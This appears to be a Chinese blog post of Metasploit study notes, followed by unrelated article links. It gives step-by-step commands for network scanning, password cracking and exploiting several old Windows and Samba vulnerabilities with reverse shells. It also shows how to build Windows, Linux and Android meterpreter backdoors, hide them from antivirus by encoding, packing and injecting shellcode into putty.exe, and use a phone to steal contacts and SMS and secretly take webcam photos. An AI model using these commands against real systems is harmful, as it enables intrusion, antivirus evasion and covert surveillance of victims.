msf
——————————————————————————————————————

service postgresql start
service metasploit start
msfconsole
进入后输入db_status  查看数据库连接状态
workspace -a test 创建工作台
Workspace test 进入工作台
信息收集

      msf> whois xxx.com
      msf>whois 192.168.1.100

    在线收集服务器ip信息工具 :
    http://searchdns.netcraft.com/

      nmap -sS xxx  (-O 看操作系统)    
          msf>use auxiliary/scanner/ip/ipidseq  看某个网段谁开了**端口。  show options  看配置。set **  设置。run 开始

       msf>use auxiliary/scanner/portscan/syn  扫描开放端口 set RHOSTS ***  。set THREADS 50
    
      msf>use auxiliary/scanner/smb/smb_version 扫描网段开放445的 。 set RHOSTS 192.168.2.0/24 。set THREADS 50
    
          msf>use auxiliary/scanner/mssql/mssql_ping 扫描开放mssql
          msf>use auxiliary/scanner/ssh/ssh_version 扫描网段ssh服务器
          msf>use auxiliary/scanner/telnet/telnet_version 扫描网段telnet
          msf>use auxiliary/scanner/ftp/ftp_version 扫描网段ftp
          msf>use auxiliary/scanner/ftp/anonymous 扫描网段ftp可匿名登录的
          msf>use auxiliary/scanner/discovery/arp_sweep 存活主机
          msf>use auxiliary/scanner/http/dir_scanner 网站目录
          msf>use auxiliary/scanner/snmp/snmp_login 扫描snmp主机
          msf>use auxiliary/gather/search_email_collector 搜索网站中email地址 set DOMAIN **.com
          msf>use auxiliary/sniffer/psnuffle 嗅探抓包(ftp密码)
          search mysql_login  搜索mysql口令破解模块,并利用
          search postgre_login  搜索post sql口令破解模块
                 telnet
          search tomcat_mgr_login  搜索tomcat口令破解模
          search ssh_login  搜索ssh口令破解模块
          msf>use auxiliary/scanner/smb/samba_version 破解samba

微软等漏洞利用 如
     ms10_002  (浏览器漏洞):
      msf>search ms10_002
      msf>use exploit/windows/browser/ms10_002_aurora
       msf>set SRVHOST  192.168...            本机ip
      msf>set payload windows/meterpreter/reverse_tcp 侦听反弹shell载荷
        msf>set SRVPORT 80   接受的端口 不设置默认8080
      msf>set URIPATH /    可有无  根目录
      msf>set LHOST 192.168...              本机ip
      msf>set LPORT 1211                    本地端口
      msf>exploit 攻击
          会有生成一个网址 给目标打开,之后返回 一些信息 session 1
      之后 输入 msf>session -i 查看会话和id*  
          使用 msf>sessions -i *  
           meterpreter>shell   获得shell 可输入cmd命令ipconfig whoami    
      ctrl z 退出   ctrl c 后台运行
————————
     ms10_018 (浏览器漏洞):
    msf>search  ms10_018
     msf>set SRVHOST  192.168...            本机ip
    msf>set SRVPORT 8081           注意冲突
    msf>set payload windows/shell/reverse_tcp   用shell 攻击性低
     msf>set LHOST 192.168...              本机ip
    msf>set LPORT 1211                    本地端口
    msf>exploit 攻击
     会有生成一个网址 给目标打开
    输入 msf>session -i 查看会话和id*
————————*****蓝屏
     ms12_020 (需要开3389   在win 输入netstat -an |find“3389” 查)
    search 结果  第二个搜索漏洞  第一个利用
————————
    ms10_046  (范围广泛)
    msf>set SRVHOST  192.168...          
    msf>set SRVPORT 80   
    msf>set payload windows/shell/reverse_tcp   
     msf>set LHOST 192.168...             
    msf>set LPORT                           
 
生成两个 一个是共享(//***)另个为网址 转化后和第一个一样 里面有文件,打开即可
————————
    ms08_067 (早期,测试,范围广)
     msf>use
    msf>set RHOST ***(mubiao)
    msf>s    
(show target)
    msf>set target **  填目标版本对应的id
————————
    ms12_004 浏览器 xpsp3 ,ie 6 7 8          *
     msf>use
     msf>set payload windows/meterpreter/reverse_tcp
    msf>set SRVHOST  192.168...          
    msf>set SRVPORT **    
     msf>set LHOST 192.168...             
    msf>set LPORT   
    exploit     
————————
    linux samba 漏洞  适应版本 debain 3.1*3.2
    search samba
    use linux/samba/lsa_transnames_heap
    show payload
    set payload linux /x86/shell_bind_tcp           ?
    set LPORT 8080
    set RHOST 192.168
    exploit
————————
    dll 注入(到目标系统)
    use exploit/windows/browser/wendab_dll_hijacker
     msf>set payload windows/meterpreter/reverse_tcp
    msf>set SRVHOST  192.168...          
    msf>set SRVPORT 80 必须80  
     msf>set RHORT **
     msf>set LHOST 192.168...             
    msf>set LPORT   
    msf>set urlpath /
————————————————————————————————————————————————
 shellcode 使用
    (少于远控 功能单一 可以生成 windows linux andriond java php)
——————    
   windows
    
    -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >shy.exe
    ****
    ****编码免杀 (-t 输出形式;-c编码次数,次数过多可能会使shellcode失            效;-e 加编码类型 ;可用msfencode -l 查看所有编码)
    -# msfpayload windows/meterpreter/reverse_tcp LHOST=** LPORT=1211 R|msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw |msfencode -e x86/countdown -c 5 -t exe -o /root/shy.exe
    ****
    ****加壳免杀 (upx壳)
    -#upx -5 shy.exe
    ****
    ****veil 免杀
    ****
    ****shellter免杀 (shellcode代码注入工具)
找一个正常运行的exe,如putty.exe,向其注入。将工具shellterv4放入kali,解压unzip shellter_v4.0.zip,进入所解压的目录,运行shellter.exe(提升其权限,chmod 777 shellter.exe).(A/M/H,选A).PE Target: /root/putty.exe (L/C/H 选L 后输入1)。set LHOST: *** 。 SET LPORT **  。
    配置监听载荷:
    msf>use payload windows/meterpreter/reverse_tcp
    msf>set LHOST **
    msf>set LPORT **
    ****
    ****    
    msf>use exploit/multi/handler
    msf>set payload windows/meterpreter/reverse_tcp
    msf>set LHOST  ***133
    msf>set LPORT   一致
    exploit
      可以用 -# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=*  LPORT=*  E
——————
 linux
    -# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=** LPORT=1211 X >/root/shy.exe
     监听
    msf>use exploit/multi/handler
    msf>set payload linux /x86/meterpreter/reverse_tcp
    msf>set LHOST  ***133
    msf>set LPORT   一致
    exploit

      可以用 -# msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=*  LPORT=*  E
在目标linux中修改exe权限 # chmod 777 shy。exe
然后。/shy 执行
——————
android

    -# msfpayload andriod/meterpreter/reverse_tcp LHOST=** LPORT=1211  R>/root/shy.apk
    监听
    msf>use exploit/multi/handler
    msf>set payload andriod/meterpreter/reverse_tcp
    msf>set LHOST  ***133
    msf>set LPORT   一致
    exploit
    dump_contacts  到出电话
    dump_sms
    Webcam_list 看有几个摄像头
    -i 1  选择后面摄像头
    webcam_snap 拍照
    webcam_stream 开摄像头

msf入门学习笔记的更多相关文章

  1. Hadoop入门学习笔记---part4

    紧接着<Hadoop入门学习笔记---part3>中的继续了解如何用java在程序中操作HDFS. 众所周知,对文件的操作无非是创建,查看,下载,删除.下面我们就开始应用java程序进行操 ...

  2. Hadoop入门学习笔记---part3

    2015年元旦,好好学习,天天向上.良好的开端是成功的一半,任何学习都不能中断,只有坚持才会出结果.继续学习Hadoop.冰冻三尺,非一日之寒! 经过Hadoop的伪分布集群环境的搭建,基本对Hado ...

  3. PyQt4入门学习笔记(三)

    # PyQt4入门学习笔记(三) PyQt4内的布局 布局方式是我们控制我们的GUI页面内各个控件的排放位置的.我们可以通过两种基本方式来控制: 1.绝对位置 2.layout类 绝对位置 这种方式要 ...

  4. PyQt4入门学习笔记(一)

    PyQt4入门学习笔记(一) 一直没有找到什么好的pyqt4的教程,偶然在google上搜到一篇不错的入门文档,翻译过来,留以后再复习. 原始链接如下: http://zetcode.com/gui/ ...

  5. Hadoop入门学习笔记---part2

    在<Hadoop入门学习笔记---part1>中感觉自己虽然总结的比较详细,但是始终感觉有点凌乱.不够系统化,不够简洁.经过自己的推敲和总结,现在在此处概括性的总结一下,认为在准备搭建ha ...

  6. Hadoop入门学习笔记---part1

    随着毕业设计的进行,大学四年正式进入尾声.任你玩四年的大学的最后一次作业最后在激烈的选题中尘埃落定.无论选择了怎样的选题,无论最后的结果是怎样的,对于大学里面的这最后一份作业,也希望自己能够尽心尽力, ...

  7. Scala入门学习笔记三--数组使用

    前言 本篇主要讲Scala的Array.BufferArray.List,更多教程请参考:Scala教程 本篇知识点概括 若长度固定则使用Array,若长度可能有 变化则使用ArrayBuffer 提 ...

  8. OpenCV入门学习笔记

    OpenCV入门学习笔记 参照OpenCV中文论坛相关文档(http://www.opencv.org.cn/) 一.简介 OpenCV(Open Source Computer Vision),开源 ...

  9. stylus入门学习笔记

    title: stylus入门学习笔记 date: 2018-09-06 17:35:28 tags: [stylus] description: 学习到 vue, 有人推荐使用 stylus 这个 ...

随机推荐

  1. [Scikit-learn] 2.1 Clustering - Variational Bayesian Gaussian Mixture

    最重要的一点是:Bayesian GMM为什么拟合的更好? PRML 这段文字做了解释: Ref: http://freemind.pluskid.org/machine-learning/decid ...

  2. 349B - Color the Fence

    Color the Fence Time Limit:2000MS     Memory Limit:262144KB     64bit IO Format:%I64d & %I64u Su ...

  3. King

    King Time Limit: 2000/1000 MS (Java/Others) Memory Limit: 65536/32768 K (Java/Others) Total Submissi ...

  4. Basic Data Structure

    Basic Data Structure Time Limit: 7000/3500 MS (Java/Others)    Memory Limit: 65536/65536 K (Java/Oth ...

  5. 我的Spring学习记录(五)

    在我的Spring学习记录(四)中使用了注解的方式对前面三篇做了总结.而这次,使用了用户登录及注册来对于本人前面四篇做一个应用案例,希望通过这个来对于我们的Spring的使用有一定的了解. 1. 程序 ...

  6. HTML中引入CSS的方法

    在HTML中引入CSS的方法主要有四种,它们分别是行内式.内嵌式.链接式和导入式. 1.行内式 行内式是在标记的style属性中设定CSS样式.这种方式没有体现出CSS的优势,不推荐使用. 2.内嵌式 ...

  7. 用python做小说网站

    html头部 {% extends 'base.html' %} {% load static %} {% block title %}小说首页{% endblock %} {% block cont ...

  8. 学习cordic算法所得(流水线结构、Verilog标准)

    最近学习cordic算法,并利用FPGA实现,在整个学习过程中,对cordic算法原理.FPGA中流水线设计.Verilog标准有了更加深刻的理解. 首先,cordic算法的基本思想是通过一系列固定的 ...

  9. 手 Q 人脸识别动画实现详解

    欢迎大家前往腾讯云社区,获取更多腾讯海量技术实践干货哦~ 前言 开门见山,先来看下效果吧. 看到这么酷炫的效果图,不得不赞叹一下我们的设计师.然而,站在程序员的角度上看,除了酷炫之外更多的是复杂.但是 ...

  10. 学习java的优势

    学习java之后,到企业的岗位 技术:java软件开发工程师(中初级):技术一般: 高级工程师:技术高等: 技术架构师:技术顶级: 管理:项目经理:产品经理: 质询:质询顾问:销售经理: 学会之后可以 ...